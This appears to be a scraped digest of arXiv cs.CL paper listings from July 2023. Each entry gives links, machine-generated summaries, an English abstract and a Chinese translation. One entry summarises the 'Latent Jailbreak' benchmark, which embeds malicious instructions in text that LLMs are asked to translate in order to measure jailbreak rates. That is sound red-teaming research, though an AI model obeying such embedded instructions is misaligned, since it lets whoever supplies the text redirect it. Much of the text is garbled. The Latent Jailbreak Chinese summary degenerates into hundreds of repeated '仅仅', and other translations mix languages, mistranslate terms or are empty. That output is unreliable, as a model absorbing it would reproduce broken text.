For: 本研究旨在适用于referral和targeted marketing中的influencer检测领域，利用动态网络表示来提高预测性能。* Methods: 本研究提出了一种新的framework，名为INFLECT-DGNN，它将Graph Neural Networks (GNN)和Recurrent Neural Networks (RNN)结合使用，并采用Weighted loss函数、Synthetic Minority Oversampling TEchnique (SMOTE) adapted for graph data，以及一种精心设计的rolling-window策略。* Results: 通过使用RNN来编码时间特征，并与GNNs结合使用，可以显著提高预测性能。对于不同的模型进行比较，研究发现，捕捉图表示、时间相关性和使用财务驱动的评价方法均是非常重要的。

Abstract
Leveraging network information for predictive modeling has become widespread in many domains. Within the realm of referral and targeted marketing, influencer detection stands out as an area that could greatly benefit from the incorporation of dynamic network representation due to the ongoing development of customer-brand relationships. To elaborate this idea, we introduce INFLECT-DGNN, a new framework for INFLuencer prEdiCTion with Dynamic Graph Neural Networks that combines Graph Neural Networks (GNN) and Recurrent Neural Networks (RNN) with weighted loss functions, the Synthetic Minority Oversampling TEchnique (SMOTE) adapted for graph data, and a carefully crafted rolling-window strategy. To evaluate predictive performance, we utilize a unique corporate data set with networks of three cities and derive a profit-driven evaluation methodology for influencer prediction. Our results show how using RNN to encode temporal attributes alongside GNNs significantly improves predictive performance. We compare the results of various models to demonstrate the importance of capturing graph representation, temporal dependencies, and using a profit-driven methodology for evaluation.

摘要
利用网络信息进行预测已经在多个领域广泛应用。在推荐和targeted市场营销方面，Influencer检测是一个可以受益于动态网络表示的领域。为了详细说明这个想法，我们提出了INFLECT-DGNN框架，它将Graph Neural Networks (GNN)和Recurrent Neural Networks (RNN)结合，并使用负权重函数，SMOTE算法适应图数据，以及一种精心制定的滚动窗口策略。为了评估预测性能，我们使用了一个独特的企业数据集，并 derivate了一种基于利润的评估方法ology for influencer prediction。我们的结果表明，使用RNN来编码时间特征并与GNNs结合可以明显提高预测性能。我们对不同的模型进行比较，以示出capturing图表示、时间依赖和使用利润驱动的评估方法ology的重要性。

A max-affine spline approximation of neural networks using the Legendre transform of a convex-concave representation

paper_url: http://arxiv.org/abs/2307.09602
repo_url: https://github.com/adamgoodtime/legendre_net
paper_authors: Adam Perrett, Danny Wood, Gavin Brown
for: 本研究提出了一种新的神经网络转换算法，用于将神经网络转换成spline表示形式。与前一些研究不同，这种算法不需要几何和分割平面的约束，而是只需要函数在某些区域具有 bounded 和有定义的第二导数。
methods: 本研究使用了一种新的算法，可以在整个神经网络中进行spline转换，而不是只在每层级独立进行转换。这种算法还可以覆盖整个神经网络，而不是只是在某些层级进行。
results: 实验表明，这种算法可以准确地将神经网络转换成spline表示形式，并且可以在不同的神经网络架构中进行应用。此外，这种算法还可以提取神经网络特征图，从而帮助更好地理解神经网络的工作机理。

Abstract
This work presents a novel algorithm for transforming a neural network into a spline representation. Unlike previous work that required convex and piecewise-affine network operators to create a max-affine spline alternate form, this work relaxes this constraint. The only constraint is that the function be bounded and possess a well-define second derivative, although this was shown experimentally to not be strictly necessary. It can also be performed over the whole network rather than on each layer independently. As in previous work, this bridges the gap between neural networks and approximation theory but also enables the visualisation of network feature maps. Mathematical proof and experimental investigation of the technique is performed with approximation error and feature maps being extracted from a range of architectures, including convolutional neural networks.

摘要
这个工作提出了一种新的算法，用于将神经网络转换为spline表示。与前一些工作不同，这个算法不需要几何和分割 affine网络运算符来创建一个最大 affine spline alternate form。而是放宽了这些约束。只需要函数是受限的并具有明确的二阶导数，但是这在实验中未能够很好地证明。此外，这种方法还可以在整个网络中进行，而不仅仅是在每层独立进行。这种方法将神经网络和近似理论相连接，并且允许Feature map的可视化。数学证明和实验研究这种技术，包括卷积神经网络，进行了错误估计和特征图Extraction。

A Comprehensive Survey of Forgetting in Deep Learning Beyond Continual Learning

paper_url: http://arxiv.org/abs/2307.09218
repo_url: https://github.com/ennengyang/awesome-forgetting-in-deep-learning
paper_authors: Zhenyi Wang, Enneng Yang, Li Shen, Heng Huang
for: This paper aims to provide a comprehensive survey of forgetting in deep learning, exploring its various manifestations and challenges, and highlighting its potential advantages in certain cases.
methods: The paper draws upon ideas and approaches from various fields that have dealt with forgetting, including continual learning, generative models, and federated learning.
results: The paper presents a nuanced understanding of forgetting and highlights its potential advantages in certain scenarios, such as privacy-preserving scenarios. It also provides a comprehensive list of papers about forgetting in various research fields for future reference.

Abstract
Forgetting refers to the loss or deterioration of previously acquired information or knowledge. While the existing surveys on forgetting have primarily focused on continual learning, forgetting is a prevalent phenomenon observed in various other research domains within deep learning. Forgetting manifests in research fields such as generative models due to generator shifts, and federated learning due to heterogeneous data distributions across clients. Addressing forgetting encompasses several challenges, including balancing the retention of old task knowledge with fast learning of new tasks, managing task interference with conflicting goals, and preventing privacy leakage, etc. Moreover, most existing surveys on continual learning implicitly assume that forgetting is always harmful. In contrast, our survey argues that forgetting is a double-edged sword and can be beneficial and desirable in certain cases, such as privacy-preserving scenarios. By exploring forgetting in a broader context, we aim to present a more nuanced understanding of this phenomenon and highlight its potential advantages. Through this comprehensive survey, we aspire to uncover potential solutions by drawing upon ideas and approaches from various fields that have dealt with forgetting. By examining forgetting beyond its conventional boundaries, in future work, we hope to encourage the development of novel strategies for mitigating, harnessing, or even embracing forgetting in real applications. A comprehensive list of papers about forgetting in various research fields is available at \url{https://github.com/EnnengYang/Awesome-Forgetting-in-Deep-Learning}.

摘要
忘却（Forgetting）是指先前学习或知识的失去或衰退。 existed 的学习surveys 主要集中在持续学习中，但忘却是深度学习其他研究领域中的普遍现象。忘却在生成模型中的 generator shifts 和联合学习中的客户端数据分布不同性等研究领域中出现。 Addressing忘却包括保持过去任务知识与快速学习新任务的 equilibrio, 管理任务干扰与 conflicting goals, 以及防止隐私泄露等挑战。另外，大多数已有的学习surveys 假设忘却总是有害的。然而，我们的survey 认为忘却是一把双刃剑，在某些情况下可以是有利的，如隐私保护场景。通过探讨忘却在更广泛的上下文中，我们希望提供一个更加细腻的理解，并强调其 potential advantages。通过这种全面的survey，我们希望探索可以利用不同领域中的想法和方法来 mitigate、利用或甚至欢迎忘却的实际应用。一个包含各种研究领域中忘却的完整列表可以在 \url{https://github.com/EnnengYang/Awesome-Forgetting-in-Deep-Learning} 上找到。

2023-07-17

cs.CL

cs.CL - 2023-07-17

Syntax-Aware Complex-Valued Neural Machine Translation

paper_url: http://arxiv.org/abs/2307.08586
repo_url: None
paper_authors: Yang Liu, Yuexian Hou
for: 提高 neural machine translation (NMT) 的翻译性能
methods: 使用复杂值 Encoder-Decoder 架构，并将 syntax 信息直接 интегрирован到 NMT 模型中，使用注意机制来学习 word-level 和 syntax-level 注意力分数
results: 实验结果表明，提出的方法可以在两个数据集上提高 BLEU 分数，尤其是在语言对的 sintactic 差异较大的翻译任务中获得更大的改善。

Abstract
Syntax has been proven to be remarkably effective in neural machine translation (NMT). Previous models obtained syntax information from syntactic parsing tools and integrated it into NMT models to improve translation performance. In this work, we propose a method to incorporate syntax information into a complex-valued Encoder-Decoder architecture. The proposed model jointly learns word-level and syntax-level attention scores from the source side to the target side using an attention mechanism. Importantly, it is not dependent on specific network architectures and can be directly integrated into any existing sequence-to-sequence (Seq2Seq) framework. The experimental results demonstrate that the proposed method can bring significant improvements in BLEU scores on two datasets. In particular, the proposed method achieves a greater improvement in BLEU scores in translation tasks involving language pairs with significant syntactic differences.

摘要
syntax 已经被证明可以在神经机器翻译（NMT）中发挥 Remarkably 的效果。在过去的模型中，从 sintactic parsing 工具中获取了 syntax 信息，然后将其集成到 NMT 模型中，以提高翻译性能。在这项工作中，我们提议一种将 syntax 信息 incorporated 到复杂值 Encoder-Decoder 架构中的方法。该方法使用注意力机制，在源侧到目标侧的翻译过程中同时学习 word-level 和 syntax-level 注意力分数。很重要的是，该方法不依赖于特定的网络架构，可以直接integrated 到任何现有的 sequence-to-sequence（Seq2Seq）框架中。实验结果表明，我们提议的方法可以在两个 dataset 上提供显著的改善，特别是在语言对应的语言对中进行翻译任务时。

The Resume Paradox: Greater Language Differences, Smaller Pay Gaps

paper_url: http://arxiv.org/abs/2307.08580
repo_url: None
paper_authors: Joshua R. Minot, Marc Maier, Bradford Demarest, Nicholas Cheney, Christopher M. Danforth, Peter Sheridan Dodds, Morgan R. Frank
for: 这种研究旨在探讨工作者自我表达如何影响 gender pay gap.
methods: 研究使用美国工作者数百万个简历语言分析gender pay gap.
results: 研究发现，在不同行业中，男女简历语言差异对 gender pay gap 的影响相对较小，但是尽管如此，具有更高语言差异的行业却有较低的gender pay gap. 每年增加两倍语言差异，女性工作者的平均年薪增加2,797美元。

Abstract
Over the past decade, the gender pay gap has remained steady with women earning 84 cents for every dollar earned by men on average. Many studies explain this gap through demand-side bias in the labor market represented through employers' job postings. However, few studies analyze potential bias from the worker supply-side. Here, we analyze the language in millions of US workers' resumes to investigate how differences in workers' self-representation by gender compare to differences in earnings. Across US occupations, language differences between male and female resumes correspond to 11% of the variation in gender pay gap. This suggests that females' resumes that are semantically similar to males' resumes may have greater wage parity. However, surprisingly, occupations with greater language differences between male and female resumes have lower gender pay gaps. A doubling of the language difference between female and male resumes results in an annual wage increase of $2,797 for the average female worker. This result holds with controls for gender-biases of resume text and we find that per-word bias poorly describes the variance in wage gap. The results demonstrate that textual data and self-representation are valuable factors for improving worker representations and understanding employment inequities.

摘要
We find that language differences between male and female resumes account for 11% of the variation in the gender pay gap. Specifically, we find that female resumes that are semantically similar to male resumes are associated with greater wage parity. However, surprisingly, occupations with greater language differences between male and female resumes have lower gender pay gaps.Furthermore, we find that a doubling of the language difference between female and male resumes results in an annual wage increase of $2,797 for the average female worker. This result holds even when controlling for gender-biases of resume text, and we find that per-word bias poorly describes the variance in wage gap.Overall, our results demonstrate that textual data and self-representation are valuable factors for improving worker representations and understanding employment inequities.

Discovering collective narratives shifts in online discussions

paper_url: http://arxiv.org/abs/2307.08541
repo_url: None
paper_authors: Wanying Zhao, Fiona Guo, Kristina Lerman, Yong-Yeol Ahn
for: This paper aims to develop a systematic and computational understanding of online narratives, specifically in the context of social media, to better understand how they emerge, spread, and die.
methods: The proposed framework combines change point detection, semantic role labeling (SRL), and automatic aggregation of narrative fragments into narrative networks to reliably and automatically extract narratives from massive amounts of text data.
results: The proposed approach is evaluated using synthetic and empirical data from two Twitter corpora related to COVID-19 and the 2017 French Election, and the results demonstrate that the approach can recover major narrative shifts that correspond to significant events.Here is the same information in Simplified Chinese text:
for: 这篇论文目的是为了提供一种系统的计算机理解社交媒体上的故事，以更好地理解它们如何出现、传播和消亡。
methods: 该提议的框架结合变化点检测、Semantic Role Labeling（SRL）和自动聚合故事片断到故事网络，以可靠地和自动地从大量文本数据中提取故事。
results: 该提议的方法在使用生成的和实际数据两个Twitter corpora相关于COVID-19和2017法国大选进行评估，结果表明该方法可以回归主要的故事变化，与主要事件相吻合。

Abstract
Narrative is a foundation of human cognition and decision making. Because narratives play a crucial role in societal discourses and spread of misinformation and because of the pervasive use of social media, the narrative dynamics on social media can have profound societal impact. Yet, systematic and computational understanding of online narratives faces critical challenge of the scale and dynamics; how can we reliably and automatically extract narratives from massive amount of texts? How do narratives emerge, spread, and die? Here, we propose a systematic narrative discovery framework that fill this gap by combining change point detection, semantic role labeling (SRL), and automatic aggregation of narrative fragments into narrative networks. We evaluate our model with synthetic and empirical data two-Twitter corpora about COVID-19 and 2017 French Election. Results demonstrate that our approach can recover major narrative shifts that correspond to the major events.

摘要
叙述是人类认知和决策的基础。因为叙述在社会话语中发挥重要作用，并且在社会媒体上广泛传播谣言，因此在社会媒体上的叙述动态可能有深远的社会影响。然而，系统化和计算化地理解社会媒体上的叙述遇到了重要的挑战，即如何可靠地和自动地提取叙述？叙述是如何产生、传播和死亡的？我们提出了一个系统的叙述发现框架，通过结合变点检测、semantic role labeling（SRL）和自动聚合叙述碎片而填补这个空白。我们使用了两个Twitter数据集，一个是关于COVID-19的，另一个是关于2017年法国大选。结果表明，我们的方法可以重现主要的叙述变化，与主要事件相吻合。

Large-Scale Evaluation of Topic Models and Dimensionality Reduction Methods for 2D Text Spatialization

paper_url: http://arxiv.org/abs/2307.11770
repo_url: https://github.com/cgshpi/topic-models-and-dimensionality-reduction-benchmark
paper_authors: Daniel Atzberger, Tim Cech, Willy Scheibel, Matthias Trapp, Rico Richter, Jürgen Döllner, Tobias Schreck
For: The paper is written for deriving spatializations for text corpora using topic models and dimensionality reduction methods, and evaluating the effectiveness of these methods for creating high-quality layouts.* Methods: The paper uses a combination of topic models and dimensionality reduction methods, including Latent Dirichlet Allocation (LDA) and t-Distributed Stochastic Neighbor Embedding (t-SNE), to create two-dimensional scatter plots of text corpora.* Results: The paper presents a large-scale computational evaluation of the effectiveness of these methods, using a set of corpora and quality metrics to quantify the preservation of local and global properties and the perceptual effectiveness of the resulting layouts. The results show that interpretable topic models are beneficial for capturing the structure of text corpora, and that t-SNE is a good choice for subsequent dimensionality reduction.

Abstract
Topic models are a class of unsupervised learning algorithms for detecting the semantic structure within a text corpus. Together with a subsequent dimensionality reduction algorithm, topic models can be used for deriving spatializations for text corpora as two-dimensional scatter plots, reflecting semantic similarity between the documents and supporting corpus analysis. Although the choice of the topic model, the dimensionality reduction, and their underlying hyperparameters significantly impact the resulting layout, it is unknown which particular combinations result in high-quality layouts with respect to accuracy and perception metrics. To investigate the effectiveness of topic models and dimensionality reduction methods for the spatialization of corpora as two-dimensional scatter plots (or basis for landscape-type visualizations), we present a large-scale, benchmark-based computational evaluation. Our evaluation consists of (1) a set of corpora, (2) a set of layout algorithms that are combinations of topic models and dimensionality reductions, and (3) quality metrics for quantifying the resulting layout. The corpora are given as document-term matrices, and each document is assigned to a thematic class. The chosen metrics quantify the preservation of local and global properties and the perceptual effectiveness of the two-dimensional scatter plots. By evaluating the benchmark on a computing cluster, we derived a multivariate dataset with over 45 000 individual layouts and corresponding quality metrics. Based on the results, we propose guidelines for the effective design of text spatializations that are based on topic models and dimensionality reductions. As a main result, we show that interpretable topic models are beneficial for capturing the structure of text corpora. We furthermore recommend the use of t-SNE as a subsequent dimensionality reduction.

摘要
Topic models 是一类不监督学习算法，用于检测文本集合中的 semantic structure。与随后的维度减少算法结合使用，topic models 可以用于生成文本集合的 two-dimensional scatter plot，反映文档之间的 semantic similarity，并支持文档集合分析。although the choice of topic model, dimensionality reduction, and their underlying hyperparameters have a significant impact on the resulting layout, it is unknown which particular combinations result in high-quality layouts with respect to accuracy and perception metrics.To investigate the effectiveness of topic models and dimensionality reduction methods for the spatialization of corpora as two-dimensional scatter plots (or basis for landscape-type visualizations), we present a large-scale, benchmark-based computational evaluation. Our evaluation consists of (1) a set of corpora, (2) a set of layout algorithms that are combinations of topic models and dimensionality reductions, and (3) quality metrics for quantifying the resulting layout. The corpora are given as document-term matrices, and each document is assigned to a thematic class. The chosen metrics quantify the preservation of local and global properties and the perceptual effectiveness of the two-dimensional scatter plots. By evaluating the benchmark on a computing cluster, we derived a multivariate dataset with over 45 000 individual layouts and corresponding quality metrics. Based on the results, we propose guidelines for the effective design of text spatializations that are based on topic models and dimensionality reductions. As a main result, we show that interpretable topic models are beneficial for capturing the structure of text corpora. We furthermore recommend the use of t-SNE as a subsequent dimensionality reduction.

Latent Jailbreak: A Test Suite for Evaluating Both Text Safety and Output Robustness of Large Language Models

paper_url: http://arxiv.org/abs/2307.08487
repo_url: https://github.com/qiuhuachuan/latent-jailbreak
paper_authors: Huachuan Qiu, Shuai Zhang, Anqi Li, Hongliang He, Zhenzhong Lan
for: 这种论文旨在评估大语言模型（LLM）是否能够遵循人类价值观和生成安全文本。
methods: 作者提出了一个新的评估标准，以评估 LLM 的安全性和可靠性。该标准包括使用潜在的监禁提示集，以评估模型在完成任务时的 robustness。
results: 研究发现，当前的 LLM 不仅会优先使用某些指令词，还会在不同的指令词上 exhibit 不同的监禁率。

Abstract
Considerable research efforts have been devoted to ensuring that large language models (LLMs) align with human values and generate safe text. However, an excessive focus on sensitivity to certain topics can compromise the model's robustness in following instructions, thereby impacting its overall performance in completing tasks. Previous benchmarks for jailbreaking LLMs have primarily focused on evaluating the safety of the models without considering their robustness. In this paper, we propose a benchmark that assesses both the safety and robustness of LLMs, emphasizing the need for a balanced approach. To comprehensively study text safety and output robustness, we introduce a latent jailbreak prompt dataset, each involving malicious instruction embedding. Specifically, we instruct the model to complete a regular task, such as translation, with the text to be translated containing malicious instructions. To further analyze safety and robustness, we design a hierarchical annotation framework. We present a systematic analysis of the safety and robustness of LLMs regarding the position of explicit normal instructions, word replacements (verbs in explicit normal instructions, target groups in malicious instructions, cue words for explicit normal instructions), and instruction replacements (different explicit normal instructions). Our results demonstrate that current LLMs not only prioritize certain instruction verbs but also exhibit varying jailbreak rates for different instruction verbs in explicit normal instructions. Code and data are available at https://github.com/qiuhuachuan/latent-jailbreak.

摘要
很多研究工作已经投入到确保大语言模型（LLM）与人类价值观 align的问题上。然而，过度强调某些话题的敏感性可能会削弱模型的完成任务能力，从而影响其总体性能。以前的 LLM 破狱 benchmark 主要关注模型的安全性而忽略了其可靠性。在这篇论文中，我们提出一个旨在评估 LLM 的安全性和可靠性的 benchmark，强调了平衡的方法。为了全面研究文本安全性和输出可靠性，我们提出了一个潜在破狱 prompt 数据集，每个包含恶意命令嵌入。为了进一步分析安全性和可靠性，我们设计了一个层次化注释框架。我们对 LLM 的安全性和可靠性进行了系统性分析，包括表示正常指令的位置、词替换（表示正常指令中的词语）、指令替换（不同的正常指令）等方面。我们的结果显示，当前 LLM 不仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅仅��

Domain Knowledge Distillation from Large Language Model: An Empirical Study in the Autonomous Driving Domain

paper_url: http://arxiv.org/abs/2307.11769
repo_url: None
paper_authors: Yun Tang, Antonio A. Bruto da Costa, Jason Zhang, Irvine Patrick, Siddartha Khastgir, Paul Jennings
for: automatize engineering processes in knowledge-based systems
methods: prompt engineering and ChatGPT language model
results: empirical assessment in autonomous driving domain, improved efficiency and output quality with human supervision

Abstract
Engineering knowledge-based (or expert) systems require extensive manual effort and domain knowledge. As Large Language Models (LLMs) are trained using an enormous amount of cross-domain knowledge, it becomes possible to automate such engineering processes. This paper presents an empirical automation and semi-automation framework for domain knowledge distillation using prompt engineering and the LLM ChatGPT. We assess the framework empirically in the autonomous driving domain and present our key observations. In our implementation, we construct the domain knowledge ontology by "chatting" with ChatGPT. The key finding is that while fully automated domain ontology construction is possible, human supervision and early intervention typically improve efficiency and output quality as they lessen the effects of response randomness and the butterfly effect. We, therefore, also develop a web-based distillation assistant enabling supervision and flexible intervention at runtime. We hope our findings and tools could inspire future research toward revolutionizing the engineering of knowledge-based systems across application domains.

摘要
工程知识基础（或专家）系统需要广泛的手动努力和领域知识。由于大型自然语言模型（LLM）在巨量跨领域知识训练中得到了很多经验，因此可以自动化工程过程。这篇论文提出了一种实践和半自动化框架，用于领域知识蒸馏，通过提问工程和LLM ChatGPT进行建构领域知识 ontology。我们在自动驾驶领域进行了实证测试，并提出了我们的关键观察。在我们的实现中，我们通过与 ChatGPT "聊天" 构建了领域知识 ontology。我们发现，完全自动化领域知识构建是可能的，但是人工监督和早期干预通常可以提高效率和输出质量，因为它们可以减少响应随机性和蝴蝶效应。因此，我们还开发了一个基于网络的蒸馏助手，以便在运行时进行监督和灵活干预。我们希望我们的发现和工具可以激励未来的工程系统知识工程研究，以推动应用领域的工程系统工程技术的革命。

Improving End-to-End Speech Translation by Imitation-Based Knowledge Distillation with Synthetic Transcripts

paper_url: http://arxiv.org/abs/2307.08426
repo_url: https://github.com/hubreb/imitkd_ast
paper_authors: Rebekka Hubert, Artem Sokolov, Stefan Riezler
for: This paper focuses on improving end-to-end automatic speech translation (AST) systems by using imitation learning to correct errors made by a student model.
methods: The authors use a teacher NMT system to correct the errors of an AST student model without relying on manual transcripts.
results: The NMT teacher is able to recover from errors in automatic transcriptions and correct erroneous translations of the AST student, leading to improvements of about 4 BLEU points over the standard AST end-to-end baseline on two datasets.Here’s the same information in Simplified Chinese:
for: 这篇论文关注改进端到端自动语音翻译（AST）系统，使用模仿学习方法来更正学生模型中的错误。
methods: 作者使用一个教师NMT系统来更正学生AST模型中的错误，而不需要人工译文。
results: NMT教师能够从自动译文中恢复错误，并更正学生AST模型中的错误翻译，在两个数据集上提高约4个BLEU分。

Abstract
End-to-end automatic speech translation (AST) relies on data that combines audio inputs with text translation outputs. Previous work used existing large parallel corpora of transcriptions and translations in a knowledge distillation (KD) setup to distill a neural machine translation (NMT) into an AST student model. While KD allows using larger pretrained models, the reliance of previous KD approaches on manual audio transcripts in the data pipeline restricts the applicability of this framework to AST. We present an imitation learning approach where a teacher NMT system corrects the errors of an AST student without relying on manual transcripts. We show that the NMT teacher can recover from errors in automatic transcriptions and is able to correct erroneous translations of the AST student, leading to improvements of about 4 BLEU points over the standard AST end-to-end baseline on the English-German CoVoST-2 and MuST-C datasets, respectively. Code and data are publicly available.\footnote{\url{https://github.com/HubReb/imitkd_ast/releases/tag/v1.1}

摘要

Enhancing Supervised Learning with Contrastive Markings in Neural Machine Translation Training

paper_url: http://arxiv.org/abs/2307.08416
repo_url: None
paper_authors: Nathaniel Berger, Miriam Exel, Matthias Huck, Stefan Riezler
for: 提高 neural machine translation（NMT）中的监督学习过程中的探索性能力
methods: 使用对比标记目标来提供自动生成的增强训练信号，对比系统假设与参考文本进行比较，并对正确/错误字符进行权重调整
results: 训练 WITH contrastive markings 可以提高 NMT 的性能，特别是在学习从 postedits 中的情况下，contrastive markings 可以指示人工错误纠正。

Abstract
Supervised learning in Neural Machine Translation (NMT) typically follows a teacher forcing paradigm where reference tokens constitute the conditioning context in the model's prediction, instead of its own previous predictions. In order to alleviate this lack of exploration in the space of translations, we present a simple extension of standard maximum likelihood estimation by a contrastive marking objective. The additional training signals are extracted automatically from reference translations by comparing the system hypothesis against the reference, and used for up/down-weighting correct/incorrect tokens. The proposed new training procedure requires one additional translation pass over the training set per epoch, and does not alter the standard inference setup. We show that training with contrastive markings yields improvements on top of supervised learning, and is especially useful when learning from postedits where contrastive markings indicate human error corrections to the original hypotheses. Code is publicly released.

摘要
通常情况下，超级vised学习在神经机器翻译（NMT）中通常采用教师强制方法，其中参考令符出现作为模型预测的conditioningContext。为了解决这种预测缺乏探索的问题，我们提出了一个简单的扩展方法，通过对参考翻译进行自动提取的对照标记目标。这些额外训练信号通过比较系统假设与参考之间的比较，来升/降重量正确/错误的字符。我们的新训练方法不会改变标准的推理设置，只需要在每个轮次上进行一次训练集的一个额外翻译过程。我们展示了在supervised学习之上进行训练，并且在postedits中学习时，对于人类错误纠正的对照标记具有特别的用处。代码公共发布。

On the application of Large Language Models for language teaching and assessment technology

paper_url: http://arxiv.org/abs/2307.08393
repo_url: None
paper_authors: Andrew Caines, Luca Benedetto, Shiva Taslimipoor, Christopher Davis, Yuan Gao, Oeistein Andersen, Zheng Yuan, Mark Elliott, Russell Moore, Christopher Bryant, Marek Rei, Helen Yannakoudakis, Andrew Mullooly, Diane Nicholls, Paula Buttery
for: 这个论文主要目的是研究大型自然语言处理模型在语言教学和评估系统中的应用潜力。
methods: 这篇论文使用了大型自然语言处理模型，包括PaLM和GPT-4，进行文本生成和自动评分等任务的研究。
results: 研究发现，大型语言模型可以在文本生成任务中提供更好的表现，但是在自动评分和语法错误检测任务中，它们并没有超越现有的state-of-the-art结果。

Abstract
The recent release of very large language models such as PaLM and GPT-4 has made an unprecedented impact in the popular media and public consciousness, giving rise to a mixture of excitement and fear as to their capabilities and potential uses, and shining a light on natural language processing research which had not previously received so much attention. The developments offer great promise for education technology, and in this paper we look specifically at the potential for incorporating large language models in AI-driven language teaching and assessment systems. We consider several research areas and also discuss the risks and ethical considerations surrounding generative AI in education technology for language learners. Overall we find that larger language models offer improvements over previous models in text generation, opening up routes toward content generation which had not previously been plausible. For text generation they must be prompted carefully and their outputs may need to be reshaped before they are ready for use. For automated grading and grammatical error correction, tasks whose progress is checked on well-known benchmarks, early investigations indicate that large language models on their own do not improve on state-of-the-art results according to standard evaluation metrics. For grading it appears that linguistic features established in the literature should still be used for best performance, and for error correction it may be that the models can offer alternative feedback styles which are not measured sensitively with existing methods. In all cases, there is work to be done to experiment with the inclusion of large language models in education technology for language learners, in order to properly understand and report on their capacities and limitations, and to ensure that foreseeable risks such as misinformation and harmful bias are mitigated.

摘要
Recently released large language models such as PaLM and GPT-4 have caused a stir in popular media and public consciousness, with both excitement and fear about their capabilities and potential uses. This has shone a light on natural language processing research, which had not previously received so much attention. These developments offer great promise for education technology, and in this paper we explore the potential for incorporating large language models in AI-driven language teaching and assessment systems. We examine several research areas and also discuss the risks and ethical considerations surrounding generative AI in education technology for language learners.We find that larger language models offer improvements over previous models in text generation, opening up new possibilities for content generation. However, for text generation, careful prompting is necessary, and the outputs may need to be reshaped before they are ready for use. In terms of automated grading and grammatical error correction, early investigations suggest that large language models on their own do not improve on state-of-the-art results according to standard evaluation metrics. For grading, it appears that linguistic features established in the literature should still be used for best performance, and for error correction, the models may offer alternative feedback styles that are not measured sensitively with existing methods.In all cases, there is work to be done to experiment with the inclusion of large language models in education technology for language learners, in order to properly understand and report on their capacities and limitations, and to mitigate foreseeable risks such as misinformation and harmful bias.

How do software citation formats evolve over time? A longitudinal analysis of R programming language packages

paper_url: http://arxiv.org/abs/2307.09390
repo_url: None
paper_authors: Yuzhuo Wang, Kai Li
for: 本研究旨在探讨软件引用的复杂性，以便更好地理解软件引用的政策和基础设施。
